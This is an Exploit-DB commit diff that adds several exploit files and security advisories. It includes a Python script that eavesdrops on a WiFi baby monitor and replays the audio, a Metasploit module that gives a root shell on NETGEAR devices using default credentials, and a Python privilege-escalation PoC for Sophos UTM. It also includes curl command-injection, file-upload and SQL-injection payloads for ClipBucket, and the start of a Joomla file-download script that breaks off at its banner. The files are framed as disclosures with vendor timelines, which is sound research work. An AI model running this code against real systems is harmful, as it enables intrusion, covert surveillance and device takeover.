DB: 2018-03-06

12 changes to exploits/shellcodes

Suricata < 4.0.4 - IDS Detection Bypass
ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions
Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit
Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow
Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation
Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record
NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)

Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)

Parallels Remote Application Server 15.5 - Path Traversal
ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection
Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download
This commit is contained in:
Offensive Security 2018-03-06 05:01:50 +00:00
parent aee073fb7e
commit 6a017b10c8
11 changed files with 1617 additions and 2 deletions

View file

@ -0,0 +1,166 @@
Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite (the free version of WiFi Baby Monitor). Although the premium version offered users the ability to specify a password to be used in the pairing process, the free version offered no such function.
Monitoring the traffic using Wireshark during the pairing process revealed:
- The initial connection is made on port 8257
- To start the pairing process, the same sequence is sent each time
- After the pairing process is finished, another connection is opened to port 8258, where the audio data will be transmitted
- After the connection is made to port 8258, the connection on port 8257 is kept open and used as a heartbeat for the session
- On the heartbeat connection, the client will periodically send 0x01 to the baby monitor (roughly once per second)
## Abusing The Protocol to Record Audio
With the pairing process reversed, it was possible to create a proof of concept which proved that it was possible to deploy a small program into a compromised network which would eavesdrop on a baby monitor and allow for an attacker to play the recording back at a later date at their discretion.
The [very hacky] proof of concept code can be found below:
```
import socket
import sys
import time
if len(sys.argv) < 2:
print "Usage: python {file} target_ip [port]".format(file = sys.argv[0])
exit(1)
target = sys.argv[1]
port = 8257
if len(sys.argv) == 3:
port = int(sys.argv[2])
s = socket.socket()
s.connect((target, port))
s.send('\x01')
s.send('\x02\x64\x00\x00\x00\x13\x2b\x52\x65\x63\x65\x69\x76\x65\x72\x53' +
'\x74\x61\x72\x74\x5f\x32\x2e\x30\x32\x00\x00\x00\x00\x03\x23\x31' +
'\x30\x00\x00\x00\x00\x03\x23\x32\x30\x00\x00\x00\x00\x03\x23\x32' +
'\x31\x00\x00\x00\x00\x03\x23\x32\x32\x00\x00\x00\x00\x03\x23\x32' +
'\x33')
heartbeat_dump = open('dump.heartbeat.bin', 'wb')
data_dump = open('dump.data.bin', 'wb')
has_data_socket = False
data_socket = socket.socket()
delta = 0
while True:
time.sleep(1)
data = s.recv(2048)
if data is not None:
heartbeat_dump.write(data)
print '[*] Received {bytes} bytes on heartbeat socket'.format(bytes = len(data))
s.send('\x01')
if has_data_socket:
data = data_socket.recv(2048)
if data is not None:
data_dump.write(data)
print '[*] Received {bytes} bytes on data socket'.format(bytes = len(data))
data_socket.send('\x01')
else:
print '[*] Establishing data connection'
data_socket.connect((target, 8258))
data_socket.send('\x01')
data_socket.send('\x02\x64\x00\x00\x00\x07\x33\x5f\x5f\x30\x30\x30\x30')
has_data_socket = True
print '[*] Established data connection'
delta += 1
heartbeat_dump.close
data_dump.close
```
This script establishes a connection to the baby monitor and begins to dump out the data from port 8257 to dump.heartbeat.bin and the data from port 8258 to dump.data.bin.
Replaying the Recordings
In order to replay the recordings made by the proof of concept, I created a second script which would act as a baby monitor and replay the data back to a client; which allows for replay via the original application:
```
import socket
import sys
import time
s = socket.socket()
s.bind(('0.0.0.0', 8257))
s.listen(5)
print '[*] Heartbeat socket listening on port 8257'
data_socket = socket.socket()
data_socket.bind(('0.0.0.0', 8258))
data_socket.listen(5)
print '[*] Data socket listening on port 8258'
data = ''
with open('dump.heartbeat.bin', 'r') as replay_file:
data = replay_file.read()
wav_data = ''
with open('dump.data.bin', 'r') as wav_file:
wav_data = wav_file.read()
c, addr = s.accept()
print '[*] Connection from {client}'.format(client = addr)
c.send(data)
data_connection, addr = data_socket.accept()
print '[*] Data connection from {client}'.format(client = addr)
data_connection.send(wav_data)
buf_start = 0
buf_end = wav_data.find('\x00\x00\x00\x01', 1)
buf = wav_data[buf_start:buf_end]
while buf is not None:
c.send('\x01')
print '[*] Sending {bytes} bytes'.format(bytes = len(buf))
data_connection.send(buf)
time.sleep(0.1)
if buf_end == -1 or buf_start == -1:
buf = None
else:
buf_start = buf_end
buf_end = wav_data.find('\x00\x00\x00\x01', buf_end + 1)
if buf_end == -1:
buf = wav_data[buf_start:]
else:
buf = wav_data[buf_start:buf_end]
data_connection.close()
c.close()
print '[*] Connection closed'
```
A demonstration of the replay script accepting a connection from a client and replaying a recording can be seen below:
https://vimeo.com/258487598
## Solution
When notified, the vendor took the [respectably] responsible approach and made available to the free version the security features that were previously exclusive to the premium version.
To prevent this attack, users can simply update to the latest version of the application (v2.02.2, at the time of writing this).
## CVE-ID
CVE-2018-7661
## CVSS Score
CVSS Base Score: 5.9
Impact Subscore: 4.2
Exploitability Subscore: 1.6
CVSS Temporal Score: 5.3
Overall CVSS Score: 5.3
Vector: AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C
## Disclosure Timeline
2018-02-11: Initial contact with vendor to make them aware of the attack vector
2018-02-12: Vendor acknowledged the issue and provided keys to test the premium version to verify the encryption and password protection would resolve the issue
2018-02-15: Confirmation sent to vendor to let them know the proposed solution should nullify the attack
2018-02-16: Vendor begins roll-out process for the new update
2018-02-22: Roll-out process completed and version 2.02.2 made available to the public

242
exploits/hardware/remote/44245.rb Executable file
View file

@ -0,0 +1,242 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Capture
def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR TelnetEnable',
'Description' => %q{
This module sends a magic packet to a NETGEAR device to enable telnetd.
Upon successful connect, a root shell should be presented to the user.
},
'Author' => [
'Paul Gebheim', # Python PoC (TCP)
'insanid', # Python PoC (UDP)
'wvu', # Metasploit module
],
'References' => [
['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
['URL', 'https://github.com/insanid/netgear-telenetenable']
],
'DisclosureDate' => 'Oct 30 2009', # Python PoC (TCP)
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Targets' => [
['Automatic (detect TCP or UDP)',
proto: :auto
],
['TCP (typically older devices)',
proto: :tcp,
username: 'Gearguy',
password: 'Geardog'
],
['UDP (typically newer devices)',
proto: :udp,
username: 'admin',
password: 'password'
]
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(23),
OptString.new('MAC', [false, 'MAC address of device']),
OptString.new('USERNAME', [false, 'Username on device']),
OptString.new('PASSWORD', [false, 'Password on device'])
])
end
def check
# Run through protocol detection
detect_proto
# This is a gamble, but it's the closest we can get
if @proto == :tcp
CheckCode::Detected
else
CheckCode::Unknown
end
end
def exploit
# Try to do the exploit unless telnetd is detected
@do_exploit = true
# Detect TCP or UDP and presence of telnetd
@proto = target[:proto]
detect_proto if @proto == :auto
# Use supplied or ARP-cached MAC address
configure_mac if @do_exploit
# Use supplied or default creds
configure_creds if @do_exploit
# Shell it
exploit_telnetenabled if @do_exploit
connect_telnetd
end
def detect_proto
begin
connect
res = begin
sock.get_once || ''
rescue EOFError
''
end
# telnetenabled returns no data, unlike telnetd
if res.length == 0
print_good('Detected telnetenabled on TCP')
else
print_good('Detected telnetd on TCP')
@do_exploit = false
end
@proto = :tcp
# It's UDP... and we may not get an ICMP error...
rescue Rex::ConnectionError
print_good('Detected telnetenabled on UDP')
@proto = :udp
ensure
disconnect
end
end
def configure_mac
@mac = datastore['MAC']
return if @mac
print_status('Attempting to discover MAC address via ARP')
begin
open_pcap
@mac = lookup_eth(rhost).first
rescue RuntimeError
fail_with(Failure::BadConfig, 'Superuser access required')
ensure
close_pcap
end
if @mac
print_good("Found MAC address #{@mac}")
else
fail_with(Failure::Unknown, 'Could not find MAC address')
end
end
def configure_creds
@username = datastore['USERNAME'] || target[:username]
@password = datastore['PASSWORD'] || target[:password]
# Try to use default creds if no creds were found
unless @username && @password
tgt = targets.find { |t| t[:proto] == @proto }
@username = tgt[:username]
@password = tgt[:password]
end
print_good("Using creds #{@username}:#{@password}")
end
def exploit_telnetenabled
print_status('Generating magic packet')
payload = magic_packet(@mac, @username, @password)
begin
print_status("Connecting to telnetenabled via #{@proto.upcase}")
@proto == :tcp ? connect : connect_udp
print_status('Sending magic packet')
@proto == :tcp ? sock.put(payload) : udp_sock.put(payload)
rescue Rex::ConnectionError
fail_with(Failure::Disconnected, 'Something happened mid-connection!')
ensure
print_status('Disconnecting from telnetenabled')
@proto == :tcp ? disconnect : disconnect_udp
end
# Wait a couple seconds for telnetd to come up
print_status('Waiting for telnetd')
sleep(2)
end
def connect_telnetd
print_status('Connecting to telnetd')
connect
handler(sock)
end
# NOTE: This is almost a verbatim copy of the Python PoC
def magic_packet(mac, username, password)
mac = mac.gsub(/[:-]/, '').upcase
if mac.length != 12
fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -')
end
just_mac = mac.ljust(0x10, "\x00")
if username.length > 0x10
fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes')
end
just_username = username.ljust(0x10, "\x00")
if @proto == :tcp
if password.length > 0x10
fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')
end
just_password = password.ljust(0x10, "\x00")
elsif @proto == :udp
# Thanks to Roberto Frenna for the reserved field analysis
if password.length > 0x21
fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')
end
just_password = password.ljust(0x21, "\x00")
end
cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
md5_key = Rex::Text.md5_raw(cleartext)
payload = byte_swap((md5_key + cleartext).ljust(0x80, "\x00"))
secret_key = 'AMBIT_TELNET_ENABLE+' + password
byte_swap(blowfish_encrypt(secret_key, payload))
end
def blowfish_encrypt(secret_key, payload)
cipher = OpenSSL::Cipher.new('bf-ecb').encrypt
cipher.padding = 0
cipher.key_len = secret_key.length
cipher.key = secret_key
cipher.update(payload) + cipher.final
end
def byte_swap(data)
data.unpack('N*').pack('V*')
end
end

View file

@ -0,0 +1,183 @@
KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service
Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service
Advisory ID: KL-001-2018-007
Publication Date: 2018.03.02
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt
1. Vulnerability Details
Affected Vendor: Sophos
Affected Product: UTM 9
Affected Version: 9.410
Platform: Embedded Linux
CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation)
Impact: Privilege Escalation
Attack vector: SSH
2. Vulnerability Description
The attacker must know the password for the loginuser
account. The confd client is not available to the loginuser
account. However, the running service is accessible over
a network port on the loopback interface. By replaying the
network traffic required to obtain a SID from this service it
is possible to escalate privileges to root.
3. Technical Description
1. Obtain the a privileged session token
$ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7
loginuser@1.3.3.7's password:
$ python kl-loginuser-confd-priv_esc.py
pojiZSqWEUAUDNIQtSop
2. Using that session token, set the root password
POST /webadmin.plx HTTP/1.1
Host: 1.3.3.7:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/json; charset=UTF-8
Referer: https://1.3.3.7:4444/
Content-Length: 422
Cookie: SID=pojiZSqWEUAUDNIQtSop
DNT: 1
Connection: close
{"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1":
"loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser":
"gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID":
"1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 15:33:53 GMT
Server: Apache
Expires: Thursday, 01-Jan-1970 00:00:01 GMT
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-Content-Type-Option: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 178895
{"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000]
3. Look for success message.
"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]
4. Profit.
loginuser@[redacted]:/home/login > su
Password:
[redacted]:/home/login # id
uid=0(root) gid=0(root) groups=0(root),890(xorp)
4. Mitigation and Remediation Recommendation
The vendor has addressed this vulnerability in version
9.508. Release notes and download instructions can be found at:
https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2017.07.21 - KoreLogic submits vulnerability details to Sophos.
2017.07.21 - Sophos acknowledges receipt.
2017.09.01 - 30 business days have elapsed since the vulnerability
was reported to Sophos.
2017.09.15 - KoreLogic requests an update on the status of this and
other vulnerabilities reported to Sophos.
2017.09.18 - Sophos informs KoreLogic that this issue will require
additional engineering and requests an extension of
the disclosure timeline.
2017.09.25 - 45 business days have elapsed since the vulnerability
was reported to Sophos.
2017.11.07 - 75 business days have elapsed since the vulnerability
was reported to Sophos.
2017.12.14 - 100 business days have elapsed since the vulnerability
was reported to Sophos.
2018.01.12 - KoreLogic requests an update from Sophos.
2018.01.15 - Sophos informs KoreLogic that the expected release date
for the UTM 9.5 MR 6 version containing the mitigation
is the middle of February.
2018.01.16 - 120 business days have elapsed since the vulnerability
was reported to Sophos.
2018.02.28 - 150 business days have elapsed since the vulnerability
was reported to Sophos.
2018.03.01 - UTM 9.508 released by Sophos.
2018.03.02 - KoreLogic public disclosure.
7. Proof of Concept
from socket import socket,AF_INET,SOCK_STREAM
class Exploit:
def __init__(self):
self.host = '127.0.0.1'
self.port = 4472
self.connected = False
self.s = None
return None
def disconnect(self):
self.s.close()
return True
def send_trigger(self):
packet_one =
'00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex')
self.s.send(packet_one)
self.s.recv(4096)
packet_two =
'00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex')
self.s.send(packet_two)
self.s.recv(4096)
packet_three =
'0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex')
self.s.send(packet_three)
print self.s.recv(4096).strip()
return True
def connect(self):
self.s = socket(AF_INET, SOCK_STREAM)
self.s.connect((self.host,self.port))
self.connected = True
return True
def run(self):
self.connect()
self.send_trigger()
self.disconnect()
return True
if __name__=="__main__":
Exploit().run()
The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

View file

@ -0,0 +1,57 @@
-----------------------------------------------------
Vulnerability Type: Detection Bypass
Affected Product: Suricata
Vulnerable version: <4.0.4
CVE number: CVE-2018-6794
Found: 25.01.2018
By: Kirill Shipulin (@kirill_wow), Positive Technologies
Severity: Medium
------------------------------------------
About Suricata:
---------------
Suricata is a high performance Network Threat Detection, IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF, its supporting vendors and the community
Attack Description:
-------------------
If as a server side you break a normal TCP 3 way handshake packets order and inject some response data before 3whs is complete then data still will be received by the a client but some IDS engines may skip content checks on that.
Attack scenario TCP flow scheme:
Client -> [SYN] [Seq=0 Ack= 0] -> Evil Server
Client <- [SYN, ACK] [Seq=0 Ack= 1] <- Evil Server
Client <- [PSH, ACK] [Seq=1 Ack= 1] <- Evil Server # Injection before the 3whs is completed
Client <- [FIN, ACK] [Seq=83 Ack= 1] <- Evil Server
Client -> [ACK] [Seq=1 Ack= 84] -> Evil Server
Client -> [PSH, ACK] [Seq=1 Ack= 84] -> Evil Server
IDS signature checks for tcp stream or http response body will be skipped in the case of data injection. This attack technique requires all three packets from a malicious server to be received by a client side together before it completes 3whs. Proof of concept server was written in C to reproduce this and it works reliably in local networks. Since some network devices may affect packets transmission exploitation is not so reliable for the internet scenario.
This attack possibly may impact other network monitoring or intrusion detection systems because is not limited to Suricata IDS: an old Snort IDS version 2.9.4 is also affected.
Successful exploitation leads to a complete TCP-Stream response or HTTP response signatures bypass and may be used to prevent malicious payloads from network detection.
PoС:
----
A Working PoC server is available here: https://github.com/kirillwow/ids_bypass
There is also a traffic capture of this data injection technique.
Timeline Summary:
-----------------
2018-01-25: Issue submitted to the bug tracker.
2018-01-30: Patch ready.
2018-02-14: Suricata 4.0.4 containing the fix has been released.
References:
-----------
CVE-2018-6794
https://redmine.openinfosecfoundation.org/issues/2427
Contacts:
---------
Twitter: https://twitter.com/AttackDetection
Twitter: https://twitter.com/kirill_wow
Telegram: https://t.me/kirill_wow
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44247.zip

View file

@ -0,0 +1,245 @@
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
=======================================================================
title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
vulnerable version: <4.0.0 - Release 4902
fixed version: 4.0.0 - Release 4902
CVE number: -
impact: critical
homepage: http://clipbucket.com/
found: 2017-09-06
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players."
Source: https://clipbucket.com/about
Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.
Users are advised to immediately install the patched version provided by the
vendor.
Vulnerability overview/description:
-----------------------------------
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a serious
vulnerability as the chances for the system to be fully compromised is very
high. This same vulnerability can also be exploited by authenticated attackers
with normal user privileges.
2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.
3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.
Proof of concept:
-----------------
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the "file_name" parameter during the file upload in the script
/api/file_uploader.php:
$ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<<COMMAND HERE>>"
http://$HOST/api/file_uploader.php
Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:
$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc
|| <<COMMAND HERE>>" "http://$HOST/actions/file_downloader.php"
2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/beats_uploader.php"
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/photo_uploader.php"
Furthermore, this vulnerability is also available to authenticated users with
basic privileges:
$ curl --cookie "[--SNIP--]" -F
"coverPhoto=@valid-image-with-appended-phpcode.php"
"http://$HOST/edit_account.php?mode=avatar_bg"
3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.
URL : http://$HOST/actions/vote_channel.php
METHOD : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())
The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
$query = "UPDATE " . tbl("users") . " SET voted = voted + 1, likes = likes + 1
WHERE userid = {$userid}";
}else{
//$query = "UPDATE " . tbl("users") . " SET likes = likes (- 1) WHERE userid =
{$userid}";
$sel = "Select userid,username,likes From ".tbl("users")." WHERE userid =
{$userid}";
$result = $db->Execute($sel);
foreach ($result as $row )
$current_likes = $row['likes'];
$decremented_like = $current_likes-1;
$query = "Update ".tbl("users")." Set likes = $decremented_like Where userid
= $userid";
}
[...]
URL : http://$HOST/ajax/commonAjax.php
METHOD : POST
PAYLOAD : mode=emailExists&email=1' or '1'='1
The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$email = $_POST['email'];
$check = $db->select(tbl('users'),"email"," email='$email'");
if (!$check) {
echo "NO";
}
[...]
URL : http://$HOST/ajax/commonAjax.php
METHOD : POST
PAYLOAD : mode=userExists&username=1' or '1'='1
The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$username = $_POST['username'];
$check = $db->select(tbl('users'),"username"," username='$username'");
if (!$check) {
echo "NO";
}
[...]
Vulnerable / tested versions:
-----------------------------
Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were
the latest at the time the security vulnerabilities were discovered.
Vendor contact timeline:
------------------------
2017-10-17: Contacting vendor through email.
2017-10-18: Vendor asking for additional details.
2017-10-19: Replied to vendor.
2017-10-26: Request update from vendor, no response.
2017-11-09: Request update from vendor.
2017-11-09: Vendor response with security patches.
2017-11-10: Notified vendor the security patches don't fix the reported issues
2017-11-30: Request update from vendor.
2017-11-30: Vendor requesting for support via Skype
2017-12-07: Response to vendor.
2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again
2018-01-22: Vendor provides latest patches, scheduled for future release
2018-01-26: Verified that the patches don't fully mitigate all issues.
2018-01-29: Request update from vendor, no response.
2018-02-06: Request update from vendor, no response.
2018-02-08: Informing vendor of public release date
2018-02-08: Vendor: Stable v4.0 including security fixes will be released in
two weeks; postponing once again for two weeks
2018-02-23: Request update from vendor.
2018-02-26: Vendor publishes v4.0
2018-02-27: Public release of security advisory
Solution:
---------
The vendor provided the following patched version:
https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

265
exploits/php/webapps/44252.py Executable file
View file

@ -0,0 +1,265 @@
#!/usr/bin/python2
# -*- coding:utf-8 -*-
'''
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
'''
try:
import urllib2
except:
print "$ pip2 install urllib2"
try:
import argparse
except:
print "$ pip2 install argparse"
try:
import BeautifulSoup
except:
print "$ pip2 install BeautifulSoup"
try:
import urlparse
except:
print "$ pip2 install urlparse"
try:
import requests
except:
print "$ pip2 install requests"
try:
import threading
except:
print "$ pip2 install threading"
import time, sys , os
global Animation, slowprint, fastprint
os.system('clear')
class Lab_Collors():
vermelho = '\033[31m'
verde = '\033[32m'
azul = '\033[34m'
ciano = '\033[36m'
purple = '\033[35m'
amarelo = '\033[33m'
preto = '\033[30m'
branco = '\033[37m'
original = '\033[0;0m'
reverso = '\033[2m'
default = '\033[0m'
def slowprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush() # defeat buffering
time.sleep(8./90)
#time.sleep(10./90)
def fastprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush() # defeat buffering
time.sleep(1./50)
def Animation(String, color):
animation = "|/-\\"
for i in range(15):
time.sleep(0.1)
sys.stdout.write("\r" + "[" + animation[i % len(animation)] + "]" + color + String)
sys.stdout.flush()
print('')
print ''
parser = argparse.ArgumentParser(description='JOOMANAGER_Arbitrary_File_Download')
parser.add_argument('-t','--targets', action='store',help='--targets Targets.txt')
args = parser.parse_args()
class Lab_Banners():
Bulls = '''
, .
/| |\
|-| łαbørαŧøriø Ŧαηŧαα |-|
[ "-.____ ____.-" ]
\_ / \ ___.___ / \ _/
"-__[ ===!=== ]__-"
| | +==========================================================+
.-"" _|=__ | __=|_ ""-, | COM_JOOMANAGER ARBITRARY FILE DOWNLOAD |
`""" \ "`==´ `==´" / """´ +==========================================================+
